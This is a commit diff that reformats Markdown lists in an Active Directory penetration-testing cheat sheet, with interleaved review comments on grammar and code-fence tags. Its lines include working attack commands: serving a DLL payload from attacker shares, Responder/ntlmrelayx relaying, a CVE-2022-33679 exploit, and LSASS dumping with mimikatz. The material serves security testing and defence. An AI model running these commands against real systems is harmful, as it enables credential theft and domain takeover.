FIX - Fixing new lines (* and - )

pull/4/head
Swissky 2024-01-12 20:51:55 +01:00
parent dc9a898d55
commit 68d08f6e05
12 changed files with 61 additions and 23 deletions

View File

@ -112,6 +112,7 @@ Automated exploitation:
``` ```
**Mitigations**: **Mitigations**:
* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) * [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520)
* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) * [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9)
* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) * [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7)

View File

@ -6,6 +6,7 @@ The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`.
The exploit will execute the DLL either from the local filesystem or a remote share. The exploit will execute the DLL either from the local filesystem or a remote share.
Requirements: Requirements:
* **Spooler Service** enabled (Mandatory) * **Spooler Service** enabled (Mandatory)
* Server with patches < June 2021 * Server with patches < June 2021
* DC with `Pre Windows 2000 Compatibility` group * DC with `Pre Windows 2000 Compatibility` group
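Review bot: the third requirement, "DC with `Pre Windows 2000 Compatibility` group", is stated as if the group's existence were the condition, but that group is present in every domain; what the exploit depends on is its membership, so the bullet should say which principals must be in it for the technique to apply (and the first bullet's "(Mandatory)" suffix suggests the others are optional, which is worth making explicit). While the line is being touched, "Pre-Windows 2000 Compatible Access" is the group's actual display name.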
@ -14,6 +15,7 @@ Requirements:
**Detect the vulnerability**: **Detect the vulnerability**:
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) * Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
```ps1 ```ps1
python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
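Review bot: the fence opened in this hunk is tagged ```ps1 but wraps a Linux command line (`python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'`); since the surrounding lines are being changed anyway, retag it ```bash so it matches the `bash` fences this commit uses elsewhere (see the CVE-2022-33679 hunk) and so syntax highlighting stops treating the pipe as PowerShell.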
@ -28,20 +30,23 @@ Requirements:
``` ```
**Payload Hosting**: **Payload Hosting**:
* The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): * The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109):
```ps1 ```ps1
python3 ./smbserver.py share /tmp/smb/ python3 ./smbserver.py share /tmp/smb/
``` ```
* Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): * Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host):
```ps1 ```ps1
Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable
``` ```
* Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): * Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights):
```ps1 ```ps1
SharpWebServer.exe port=8888 dir=c:\users\public verbose=true SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
``` ```
When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll`
WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
```ps1 ```ps1
cme smb -u user -p password -d domain.local -M webdav [TARGET] cme smb -u user -p password -d domain.local -M webdav [TARGET]
``` ```
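Review bot: the `cme smb -u user -p password -d domain.local -M webdav [TARGET]` detection block at the end of this hunk is also fenced as ```ps1 although it runs from a Linux shell; ```bash is the accurate tag. The prose around it spells the protocol three ways (WebDav, webdav, and in the UNC example the port form `@8888`); the standard spelling is WebDAV, and "must be activated on exploited target" should read "on the exploited target". The note that the WebClient service is off by default on workstations and absent on servers is the useful defender detail here and is worth keeping prominent, since that default is what limits the HTTP variant of this technique.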

View File

@ -2,11 +2,14 @@
## Using BloodHound ## Using BloodHound
Use the correct collector Use the correct collector:
* AzureHound for Azure Active Directory * AzureHound for Azure Active Directory
* SharpHound for local Active Directory * SharpHound for local Active Directory
* RustHound for local Active Directory * RustHound for local Active Directory
**Examples**:
* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) * use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) * use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
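Review bot: the new "Use the correct collector:" list names three collectors (AzureHound, SharpHound, RustHound), but the **Examples** block under it, as far as this hunk shows, links only AzureHound and the BloodHound repository; if the full list has no RustHound entry, add one so the two lists correspond. Also, the example items start with lowercase "use [...]" while this same commit capitalizes "Using [...]" in the list items it touches (see the CVE-2022-33679 hunk); pick one form.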
@ -80,6 +83,7 @@ cat docker-compose.yml | docker compose -f - up
``` ```
You can add some custom queries like : You can add some custom queries like :
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) * [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) * [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) * [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
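Review bot: "You can add some custom queries like :" keeps a space before the colon; drop it ("like:") while the line is being edited. The same French-style spacing is visible in "two locations :" (ntds hunk) and "Research from Project Zero :" (Kerberoasting w/o domain account hunk) in this commit, and could be fixed in the same pass.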

View File

@ -5,6 +5,7 @@ You will need the following files to extract the ntds :
- SYSTEM hive (`C:\Windows\System32\SYSTEM`) - SYSTEM hive (`C:\Windows\System32\SYSTEM`)
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). - `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. - `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
@ -118,6 +119,7 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
``` ```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
- [hashmob.net](https://hashmob.net) - [hashmob.net](https://hashmob.net)
- [crackstation.net](https://crackstation.net) - [crackstation.net](https://crackstation.net)
- [hashes.com](https://hashes.com/en/decrypt/hash) - [hashes.com](https://hashes.com/en/decrypt/hash)
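Review bot: "If the password is not a confidential data" should read "If the password is not confidential data", and "online "cracker" like :" has the stray space before the colon. The :warning: qualifier itself is the right caveat to keep: submitting a hash to a public lookup service hands it to a third party, so the list only belongs next to that condition.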

View File

@ -3,6 +3,7 @@
> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting > If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
**Requirements**: **Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH** * Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux: * Windows/Linux:
```ps1 ```ps1
@ -61,8 +62,8 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
``` ```
**Mitigations**: **Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
## Kerberoasting w/o domain account ## Kerberoasting w/o domain account
@ -90,6 +91,7 @@ The technique is fully explained in this article: [Semperis blog post](https://w
Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
**Requirements**: **Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH** * Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux: * Windows/Linux:
```ps1 ```ps1
@ -100,7 +102,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
``` ```
* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) * Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
```bash ```bash
user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
@ -108,6 +110,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
``` ```
**Mitigations**: **Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* Disable RC4 cipher if possible. * Disable RC4 cipher if possible.

View File

@ -80,6 +80,7 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
**Mitigations**: **Mitigations**:
* Have a very long password for your accounts with SPNs (> 32 characters) * Have a very long password for your accounts with SPNs (> 32 characters)
* Make sure no users have SPNs * Make sure no users have SPNs
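Review bot: "Make sure no users have SPNs" is an absolute that the preceding bullet (long passwords for accounts with SPNs) already assumes is not achievable, since service accounts legitimately need SPNs; reword it to "minimise the number of user accounts holding SPNs" so the two mitigations are consistent with each other.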

View File

@ -67,7 +67,8 @@
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. > If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
On the machine. On the machine
* Find SCCM blob * Find SCCM blob
```ps1 ```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
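Review bot: the new side turns "On the machine." into "On the machine" with no terminating punctuation, while the BloodHound hunk of this same commit ends its list introducer with a colon ("Use the correct collector:"); use "On the machine:" here for consistency. The cmdlet name on the next line is conventionally written `Get-WmiObject`, though PowerShell resolves it case-insensitively.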

View File

@ -2,14 +2,16 @@
## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens ## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. > Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. :information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
**Requirements**: **Requirements**:
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) * LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
**Exploitation**: **Exploitation**:
* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge * Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
```ps1 ```ps1
HTTPS = On HTTPS = On
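Review bot: "symetric" is misspelled on both sides of the first changed line; since that sentence is being rewritten, make it "symmetric keys". The `Responder.conf` excerpt that follows (`HTTPS = On`) is an INI fragment, so ```ini describes it better than ```ps1. The `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel` check in Requirements doubles as the defender's audit: the mitigation in the next hunk of this file (Lan Manager authentication level set to "Send NTLMv2 responses only. Refuse LM & NTLM") is exactly the value that makes this downgrade fail, so it may be worth cross-referencing the two.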
@ -68,6 +70,7 @@
* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` * Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM`
## Capturing and cracking Net-NTLMv2/NTLMv2 hashes ## Capturing and cracking Net-NTLMv2/NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
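Review bot: "tries to access a machine and mistype the IP" needs "mistypes", and "ask for the NTLMv2 hash" is loose wording: what Responder captures is the NTLMv2 challenge/response, not the NT hash itself, which is why the next step is offline cracking. Suggest "and capture the NTLMv2 response".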

View File

@ -32,11 +32,13 @@ msf exploit(smb_relay) > show targets
## LDAP signing not required and LDAP channel binding disabled ## LDAP signing not required and LDAP channel binding disabled
During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed: During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
* LDAP signing not required (by default set to `Not required`) * LDAP signing not required (by default set to `Not required`)
* LDAP channel binding is disabled. (by default disabled) * LDAP channel binding is disabled. (by default disabled)
* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default) * `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer. Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
```bash ```bash
# On first terminal # On first terminal
sudo ./Responder.py -I eth0 -wfrd -P -v sudo ./Responder.py -I eth0 -wfrd -P -v
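Review bot: grammar in the paragraph this hunk touches: "During a security assessment", "by performing an NTLM relay attack", and "needs to be at least 1 for the account relayed" (drop the second "at"). The three requirements are also the three settings a defender checks, so keeping the default values in parentheses as the author did is good; just note "LDAP channel binding is disabled. (by default disabled)" has a stray period before the parenthesis.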
@ -141,8 +143,8 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
``` ```
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. - Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
```powershell ```powershell
# create a new machine account # create a new machine account
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
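Review bot: the fence after the bullet is tagged ```powershell, but the commands inside (`TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support`) run from a Linux shell, like the ```bash block earlier in this file; retag it ```bash. In the bullet text, "The attacker server will connect back to you" should be "The victim server will connect back to you", since the sentence describes the coerced host, not the attacker's.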
@ -158,6 +160,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
## Ghost Potato - CVE-2019-1384 ## Ghost Potato - CVE-2019-1384
Requirements: Requirements:
* User must be a member of the local Administrators group * User must be a member of the local Administrators group
* User must be a member of the Backup Operators group * User must be a member of the Backup Operators group
* Token must be elevated * Token must be elevated
@ -174,6 +177,7 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine > It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine
Requirements: Requirements:
- a shell in session 0 (e.g. WinRm shell or SSH shell) - a shell in session 0 (e.g. WinRm shell or SSH shell)
- a privileged user is logged on in the session 1 (e.g. a Domain Admin user) - a privileged user is logged on in the session 1 (e.g. a Domain Admin user)
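Review bot: "trigger an NTLM authentication" should be "triggers" to agree with "abuses", and "WinRm" is normally written "WinRM". The two requirements could also state the reason the session split matters (the attacker's shell is in session 0 while the privileged user's interactive logon is in session 1), which is what the quoted description implies but does not spell out.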
@ -189,6 +193,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
## DNS Poisonning - Relay delegation with mitm6 ## DNS Poisonning - Relay delegation with mitm6
Requirements: Requirements:
- IPv6 enabled (Windows prefers IPV6 over IPv4) - IPv6 enabled (Windows prefers IPV6 over IPv4)
- LDAP over TLS (LDAPS) - LDAP over TLS (LDAPS)
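Review bot: the heading "## DNS Poisonning - Relay delegation with mitm6" carries a typo that survives this change; it should be "Poisoning". In the first requirement, "IPV6" should be "IPv6" to match the rest of the line.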
@ -223,9 +228,11 @@ secretsdump.py -k -no-pass target.lab.local
> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB > Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
**Requirement**: **Requirement**:
* WebClient service * WebClient service
**Exploitation**: **Exploitation**:
* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` * Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 * Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` * Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
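Review bot: "**Requirement**:" is singular here while every other section this commit touches uses "**Requirements**:" (the Diamond and Sapphire ticket hunks even rename "Require:" to "Requirements:"); align it. In the list, "e.g: WIN-UBNW4FI3AP0" should be "e.g.:", and "Disable HTTP in Responder: `sudo vi ...`" describes opening the file but not which setting to change, so name the key that is being toggled.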
@ -267,12 +274,16 @@ pyrdp-mitm.py <IP>
pyrdp-mitp.py <IP>:<PORT> # with custom port pyrdp-mitp.py <IP>:<PORT> # with custom port
pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
``` ```
* Exploitation
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge **Exploitation**
* If NLA is disabled, you will obtain the password in plaintext
* Other features are available such as keystroke recording * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
* Alternatives * If NLA is disabled, you will obtain the password in plaintext
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener * Other features are available such as keystroke recording
**Alternatives**
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener
## References ## References
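Review bot: `pyrdp-mitp.py <IP>:<PORT>` on the second line of this hunk is a typo for `pyrdp-mitm.py` (the lines above and below spell it correctly) and will not run as written; fix it while the block is being reorganised. In the new "**Alternatives**" list, "S3th" should match the project name in its own URL, Seth. Restructuring the nested bullets into bold "**Exploitation**" / "**Alternatives**" headings is an improvement, but the bold labels then sit directly against the list without the blank line this commit is adding everywhere else.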

View File

@ -9,6 +9,7 @@ CVE-2020-17049
:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)` :warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
Requirements: Requirements:
* Service account's password hash * Service account's password hash
* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation` * Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013) * [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013)
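Review bot: "Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`" should be "Service account with ..." (or "accounts with"); the possessive on the first bullet ("Service account's password hash") is correct, the second is not.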

View File

@ -111,6 +111,7 @@ Converting kirbi => ccache
Mitigations: Mitigations:
* Hard to detect because they are legit TGT tickets * Hard to detect because they are legit TGT tickets
* Mimikatz generate a golden ticket with a life-span of 10 years * Mimikatz generate a golden ticket with a life-span of 10 years
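Review bot: both bullets under "Mitigations:" ("Hard to detect because they are legit TGT tickets", "Mimikatz generate a golden ticket with a life-span of 10 years") describe detection properties rather than mitigations; either retitle the block "Detection:" or rewrite the bullets as actions, for example flagging TGTs whose lifetime exceeds the domain's configured maximum, which is the observable consequence of the 10-year default the second bullet names. Also "generate" should be "generates".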
@ -148,6 +149,7 @@ Interesting services to target with a silver ticket :
Mitigations: Mitigations:
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
@ -155,7 +157,8 @@ Mitigations:
> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key > Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key
Require: Requirements:
* krbtgt NT Hash * krbtgt NT Hash
* krbtgt AES key * krbtgt AES key
@ -172,7 +175,8 @@ Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTR
The goal is to mimic the PAC field as close as possible to a legitimate one. The goal is to mimic the PAC field as close as possible to a legitimate one.
Require: Requirements:
* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) * [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411)
* krbtgt AES key * krbtgt AES key

View File

@ -64,6 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
* Adding requires lock * Adding requires lock
* Removing requires reboot * Removing requires reboot
## LSA Protection Workaround ## LSA Protection Workaround
- LSA as a Protected Process (RunAsPPL) - LSA as a Protected Process (RunAsPPL)
@ -134,6 +135,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
Use the minidump: Use the minidump:
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` * Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
```powershell ```powershell
mimikatz # sekurlsa::minidump lsass.dmp mimikatz # sekurlsa::minidump lsass.dmp